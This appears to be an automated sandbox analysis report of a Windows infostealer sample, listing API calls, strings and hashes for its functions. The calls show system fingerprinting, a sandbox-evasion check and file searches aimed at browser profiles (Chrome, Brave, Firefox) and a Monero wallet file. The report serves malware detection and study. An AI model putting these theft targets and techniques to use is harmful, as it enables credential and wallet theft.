                  • Instruction ID: ef5bb97c61aa4656642841cd9d9f5f9fc1e250b1f275d7d3d2c3d60d3de69a92
                  • Opcode Fuzzy Hash: 3666c2d8fac42e2b510474dd4c4c716acbefc58c373ea49276d2a9f9075c0bdf
                  • Instruction Fuzzy Hash: 37113070944108FBEB14FF60DD52EED7739AF60301F914168F81A4B1A2EF30AB06CA92
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00147910
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00147917
                  • GetComputerNameA.KERNEL32(?,00000104), ref: 0014792F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateComputerNameProcess
                  • String ID:
                  • API String ID: 1664310425-0
                  • Opcode ID: 0fc1918864772c18df562c6f4ab8ab971a3bce09e182999ae730d2bd5449874d
                  • Instruction ID: cbc77bbf5ac5309b47c7f682b27a3aaf0bf1507d5c771812f5130460fbed1800
                  • Opcode Fuzzy Hash: 0fc1918864772c18df562c6f4ab8ab971a3bce09e182999ae730d2bd5449874d
                  • Instruction Fuzzy Hash: 7101D6B1A04604EBC714DF84DD45BAEBBBCF744B21F100219F905E3290C37459008BA2
                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0013112B
                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00131132
                  • ExitProcess.KERNEL32 ref: 00131143
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$AllocCurrentExitNumaVirtual
                  • String ID:
                  • API String ID: 1103761159-0
                  • Opcode ID: 8a45ed0c80e003ba7317bee2efd4d87a89823cc9eb57af2b7c65453f405ac3cd
                  • Instruction ID: 32a808ae8efa8f9f11e501752144f79c01134975a6272bfe6173eb4384e69e72
                  • Opcode Fuzzy Hash: 8a45ed0c80e003ba7317bee2efd4d87a89823cc9eb57af2b7c65453f405ac3cd
                  • Instruction Fuzzy Hash: 88E08670985308FBE7206BA09C0AB0C7A7CAB44B02F100044F70C761C0C7B42640969A
                  APIs
                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 001310B3
                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 001310F7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Virtual$AllocFree
                  • String ID:
                  • API String ID: 2087232378-0
                  • Opcode ID: 95b024779bbab6fcaf63ca4a2c417c0953d91c2c0809afd45cab2d271871329f
                  • Instruction ID: 89a6b84e26f797f7e556305f03ee882f770d9957df6b0c501dd78bffb641cf53
                  • Opcode Fuzzy Hash: 95b024779bbab6fcaf63ca4a2c417c0953d91c2c0809afd45cab2d271871329f
                  • Instruction Fuzzy Hash: 37F027B1641308BBEB189BA4AC49FBFB7ECE705B15F300448F504E7280D6719F40CAA1
                  APIs
                    • Part of subcall function 001478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00147910
                    • Part of subcall function 001478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00147917
                    • Part of subcall function 001478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0014792F
                    • Part of subcall function 00147850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001311B7), ref: 00147880
                    • Part of subcall function 00147850: RtlAllocateHeap.NTDLL(00000000), ref: 00147887
                    • Part of subcall function 00147850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0014789F
                  • ExitProcess.KERNEL32 ref: 001311C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                  • String ID:
                  • API String ID: 3550813701-0
                  • Opcode ID: 46b1ce589fe0439a4a841ca19388f0886439b2a8ceafb895a53cf848bd9f1569
                  • Instruction ID: 22cf634fa7a467b1b34caa07b05b79ff47c28c665c987011001e4d14d8a8bec1
                  • Opcode Fuzzy Hash: 46b1ce589fe0439a4a841ca19388f0886439b2a8ceafb895a53cf848bd9f1569
                  • Instruction Fuzzy Hash: 5EE017B591430263CE2077B1AC0AB2E329C5B6474AF140828FA09D3262FBA5E840866A
                  APIs
                  • wsprintfA.USER32 ref: 001438CC
                  • FindFirstFileA.KERNEL32(?,?), ref: 001438E3
                  • lstrcat.KERNEL32(?,?), ref: 00143935
                  • StrCmpCA.SHLWAPI(?,00150F70), ref: 00143947
                  • StrCmpCA.SHLWAPI(?,00150F74), ref: 0014395D
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00143C67
                  • FindClose.KERNEL32(000000FF), ref: 00143C7C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                  • API String ID: 1125553467-2524465048
                  • Opcode ID: 8ccd10a2970005aae0b0ec60225f1a77fce198ee381051280224f3cb2b5da99c
                  • Instruction ID: 18c80b275484a03072bae67855c2fdd7151de0e858b15e27554524256e3598d5
                  • Opcode Fuzzy Hash: 8ccd10a2970005aae0b0ec60225f1a77fce198ee381051280224f3cb2b5da99c
                  • Instruction Fuzzy Hash: B3A160B2A00218ABDB35EFA4DC85FEE737CBF98301F044589A51D96151EB719B84CF62
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                  • FindFirstFileA.KERNEL32(00000000,?,00150B32,00150B2B,00000000,?,?,?,001513F4,00150B2A), ref: 0013BEF5
                  • StrCmpCA.SHLWAPI(?,001513F8), ref: 0013BF4D
                  • StrCmpCA.SHLWAPI(?,001513FC), ref: 0013BF63
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0013C7BF
                  • FindClose.KERNEL32(000000FF), ref: 0013C7D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                  • API String ID: 3334442632-726946144
                  • Opcode ID: 38c4657cafe4a2a7b84ea51cfebe9fb1b9714bfe907c9d8db9f8a2179001406c
                  • Instruction ID: 29b8ea2177c4ab95354273dcb76f96931444ba247c35933104e40252da61a146
                  • Opcode Fuzzy Hash: 38c4657cafe4a2a7b84ea51cfebe9fb1b9714bfe907c9d8db9f8a2179001406c
                  • Instruction Fuzzy Hash: 5F428672940104ABDB14FBB0DC96EED737DAFA4301F814558F90AA71A1EF349B49CB92
                  APIs
                  • wsprintfA.USER32 ref: 0014492C
                  • FindFirstFileA.KERNEL32(?,?), ref: 00144943
                  • StrCmpCA.SHLWAPI(?,00150FDC), ref: 00144971
                  • StrCmpCA.SHLWAPI(?,00150FE0), ref: 00144987
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00144B7D
                  • FindClose.KERNEL32(000000FF), ref: 00144B92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s$%s\%s$%s\*
                  • API String ID: 180737720-445461498
                  • Opcode ID: bef57b7b4a44a3b33549202df5d571243969ec2686052bf0439b8dbd7ea40d45
                  • Instruction ID: 27c3ebbb024cdf289cf3ad74d0c4603103294ee2fc9b123afe3973c1a511b7d7
                  • Opcode Fuzzy Hash: bef57b7b4a44a3b33549202df5d571243969ec2686052bf0439b8dbd7ea40d45
                  • Instruction Fuzzy Hash: 5B6153B2900618ABCB35EBE0DC45FEE737CBB98701F044588B51D96151EB719B89CF92
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00144580
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00144587
                  • wsprintfA.USER32 ref: 001445A6
                  • FindFirstFileA.KERNEL32(?,?), ref: 001445BD
                  • StrCmpCA.SHLWAPI(?,00150FC4), ref: 001445EB
                  • StrCmpCA.SHLWAPI(?,00150FC8), ref: 00144601
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0014468B
                  • FindClose.KERNEL32(000000FF), ref: 001446A0
                  • lstrcat.KERNEL32(?,0102E560), ref: 001446C5
                  • lstrcat.KERNEL32(?,0102D1B8), ref: 001446D8
                  • lstrlen.KERNEL32(?), ref: 001446E5
                  • lstrlen.KERNEL32(?), ref: 001446F6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                  • String ID: %s\%s$%s\*
                  • API String ID: 671575355-2848263008
                  • Opcode ID: 74966b3c8ca95725963f289b51ffef466857ae119f1ed6c942f75a73a856b716
                  • Instruction ID: cba2b19bb61d642d3136e187840226a13a52831bc8ed6a44d96e2c017cfb5493
                  • Opcode Fuzzy Hash: 74966b3c8ca95725963f289b51ffef466857ae119f1ed6c942f75a73a856b716
                  • Instruction Fuzzy Hash: E45166B2540218ABC735EBB0DC89FED777CAB98301F404588F61D96190EB749BC58F92
                  APIs
                  • wsprintfA.USER32 ref: 00143EC3
                  • FindFirstFileA.KERNEL32(?,?), ref: 00143EDA
                  • StrCmpCA.SHLWAPI(?,00150FAC), ref: 00143F08
                  • StrCmpCA.SHLWAPI(?,00150FB0), ref: 00143F1E
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0014406C
                  • FindClose.KERNEL32(000000FF), ref: 00144081
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s
                  • API String ID: 180737720-4073750446
                  • Opcode ID: 7327aca05964fb6e3f6cfd16cfe3177e14b9da3d3f0a968d66eba1ea0fa5e837
                  • Instruction ID: 2a33fcc22ca3916ce8be5b4c1eab03a7d09227daab197fb58f2c0ea941dffaef
                  • Opcode Fuzzy Hash: 7327aca05964fb6e3f6cfd16cfe3177e14b9da3d3f0a968d66eba1ea0fa5e837
                  • Instruction Fuzzy Hash: 525164B2900618BBCB35FBB0DC85EEE737CBB98301F404588B65D96050EB759B898F91
                  APIs
                  • wsprintfA.USER32 ref: 0013ED3E
                  • FindFirstFileA.KERNEL32(?,?), ref: 0013ED55
                  • StrCmpCA.SHLWAPI(?,00151538), ref: 0013EDAB
                  • StrCmpCA.SHLWAPI(?,0015153C), ref: 0013EDC1
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0013F2AE
                  • FindClose.KERNEL32(000000FF), ref: 0013F2C3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\*.*
                  • API String ID: 180737720-1013718255
                  • Opcode ID: e4e2ca815edefa7923a0e217fef071ee95eb3a9144ca06d1344a1ac523eab3fc
                  • Instruction ID: 5d16dac48b35383d744e35d63bbb3a55ffe46d2b2223c63d23d081a40ddb83f6
                  • Opcode Fuzzy Hash: e4e2ca815edefa7923a0e217fef071ee95eb3a9144ca06d1344a1ac523eab3fc
                  • Instruction Fuzzy Hash: B9E10672951119AAFB55FB60DC52EEE733CEF64305F814199B40A620A2EF306F8ACF51
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001515B8,00150D96), ref: 0013F71E
                  • StrCmpCA.SHLWAPI(?,001515BC), ref: 0013F76F
                  • StrCmpCA.SHLWAPI(?,001515C0), ref: 0013F785
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0013FAB1
                  • FindClose.KERNEL32(000000FF), ref: 0013FAC3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: prefs.js
                  • API String ID: 3334442632-3783873740
                  • Opcode ID: 87b8a36b98a39d70953f1c83227a469982ae7670985f7b7bf41fa06ed8a54e7f
                  • Instruction ID: 156b4273d17483d64a060957550030ee559a37096c7a6fbcdb92c0fe249074c6
                  • Opcode Fuzzy Hash: 87b8a36b98a39d70953f1c83227a469982ae7670985f7b7bf41fa06ed8a54e7f
                  • Instruction Fuzzy Hash: 1CB176719401089BDB24FF60DC96FEE7379AFA4305F8185A8E40A97151EF315B4ACF92
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0015510C,?,?,?,001551B4,?,?,00000000,?,00000000), ref: 00131923
                  • StrCmpCA.SHLWAPI(?,0015525C), ref: 00131973
                  • StrCmpCA.SHLWAPI(?,00155304), ref: 00131989
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00131D40
                  • DeleteFileA.KERNEL32(00000000), ref: 00131DCA
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00131E20
                  • FindClose.KERNEL32(000000FF), ref: 00131E32
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 1415058207-1173974218
                  • Opcode ID: 90eb4d1f6350af746148cfbf964be5e92e43f810bd1196c58a513ec0a4c6e310
                  • Instruction ID: 77f36e5fab45c4b7c807722b35374e508e3612bf2731e69988bf998e08b523cf
                  • Opcode Fuzzy Hash: 90eb4d1f6350af746148cfbf964be5e92e43f810bd1196c58a513ec0a4c6e310
                  • Instruction Fuzzy Hash: 8D125871990119ABEB15FB60CC96EED733CEF64305F824199B50A660A1EF306F89CF91
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00150C2E), ref: 0013DE5E
                  • StrCmpCA.SHLWAPI(?,001514C8), ref: 0013DEAE
                  • StrCmpCA.SHLWAPI(?,001514CC), ref: 0013DEC4
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0013E3E0
                  • FindClose.KERNEL32(000000FF), ref: 0013E3F2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                  • String ID: \*.*
                  • API String ID: 2325840235-1173974218
                  • Opcode ID: f4c08b2f6a9e5d6915bd04a1bffd0c64790685594a182fdd6681a4cb8880e721
                  • Instruction ID: a6c70aea99d2e46eb61b16906e527c5ba564741102837ddedfef5a5d049a2302
                  • Opcode Fuzzy Hash: f4c08b2f6a9e5d6915bd04a1bffd0c64790685594a182fdd6681a4cb8880e721
                  • Instruction Fuzzy Hash: 5AF1C2718541199AEB25EB60DC95EEE7338FF64305FC241D9A41A620A1EF306F8ACF52
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001514B0,00150C2A), ref: 0013DAEB
                  • StrCmpCA.SHLWAPI(?,001514B4), ref: 0013DB33
                  • StrCmpCA.SHLWAPI(?,001514B8), ref: 0013DB49
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0013DDCC
                  • FindClose.KERNEL32(000000FF), ref: 0013DDDE
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID:
                  • API String ID: 3334442632-0
                  • Opcode ID: cb4845a1a2769cbc2eb725be01425de2217e035f880ec39ab74b5a8adfd8f528
                  • Instruction ID: 42196aa51eacb33f8ae1dc0b5e9d9955cd8286d1a88c3022628ee9d9149588b3
                  • Opcode Fuzzy Hash: cb4845a1a2769cbc2eb725be01425de2217e035f880ec39ab74b5a8adfd8f528
                  • Instruction Fuzzy Hash: E8917672940104ABDB14FBB0EC569ED737DAFA4305F818668F80A96191EF349B4DCB93
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: /4a$L,tw$Y5;_$kCq}$s?_$KVW$a}$|
                  • API String ID: 0-459462844
                  • Opcode ID: 09f597461a65a1ffb891aee149d95ec33f16de602db645bef53b32f7b9c4e7f4
                  • Instruction ID: c3544d63376764c16b16cec25c9109492b47807488fcfc5ebcec2a82e182c456
                  • Opcode Fuzzy Hash: 09f597461a65a1ffb891aee149d95ec33f16de602db645bef53b32f7b9c4e7f4
                  • Instruction Fuzzy Hash: 12B229F3A0C2149FE3046E2DEC8567AFBE9EF94720F16463EEAC5C3744E93558018696
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: '/o~$3"kW$?I}'$TO_&$d~~$g$j$y0t$z0t
                  • API String ID: 0-793602160
                  • Opcode ID: 00404fcd1267f3e561f3367b606a71042534d69e5f192326a5102d94425b0c97
                  • Instruction ID: ceea04f84da1ae57fb4eaac02ab10fe1c2392d0ace11d82676df1c88e3676e77
                  • Opcode Fuzzy Hash: 00404fcd1267f3e561f3367b606a71042534d69e5f192326a5102d94425b0c97
                  • Instruction Fuzzy Hash: 9CB2F7F360C2049FE304AE2DEC8577ABBE9EF94720F1A453DE6C4C7744EA3598058696
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                  • GetKeyboardLayoutList.USER32(00000000,00000000,001505AF), ref: 00147BE1
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00147BF9
                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00147C0D
                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00147C62
                  • LocalFree.KERNEL32(00000000), ref: 00147D22
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                  • String ID: /
                  • API String ID: 3090951853-4001269591
                  • Opcode ID: 73034a70f9d72cabcc3f3ad586f78b5e7961fd19ac02c49ac1989a0244df6585
                  • Instruction ID: 8f266eb4b3acf34f168f39029cc294c1954d6148893de05b3cedc0a1ae6c0d3c
                  • Opcode Fuzzy Hash: 73034a70f9d72cabcc3f3ad586f78b5e7961fd19ac02c49ac1989a0244df6585
                  • Instruction Fuzzy Hash: 0E418E71940218ABDB24DF94DC99BEEB378FF58701F6041D9E409621A0DB342F85CFA1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: !q_$#ign$*z)$Co}$Htw~$oI}$r!my
                  • API String ID: 0-641420045
                  • Opcode ID: 984e36127ccb1973385178b7806184a78a04cb11f4c5b248469dca2ea9cd132b
                  • Instruction ID: a2cda7dae0ce6ffb1e06567f193560054c749dbd3f6e199dc69b31e7f3aa60fa
                  • Opcode Fuzzy Hash: 984e36127ccb1973385178b7806184a78a04cb11f4c5b248469dca2ea9cd132b
                  • Instruction Fuzzy Hash: E2B2F9F360C2049FE3046E2DEC8567AFBE5EF94720F1A463DE6C5C7744EA3598018696
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Yf|~$eb)[$fk?$l '}$-_~$=}$zPe
                  • API String ID: 0-643601056
                  • Opcode ID: 111012089001c0cb4a7fcf494ec8c56f37c63995151c0d436de0e3f989031872
                  • Instruction ID: 118516986f1b8b4fccc0542f08e284d7f99ae6f45efb46328506e4041e17b001
                  • Opcode Fuzzy Hash: 111012089001c0cb4a7fcf494ec8c56f37c63995151c0d436de0e3f989031872
                  • Instruction Fuzzy Hash: 20B206F3A08214AFD314AE2DEC8577ABBE9EF94720F16493DEAC4C3744E53598058693
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
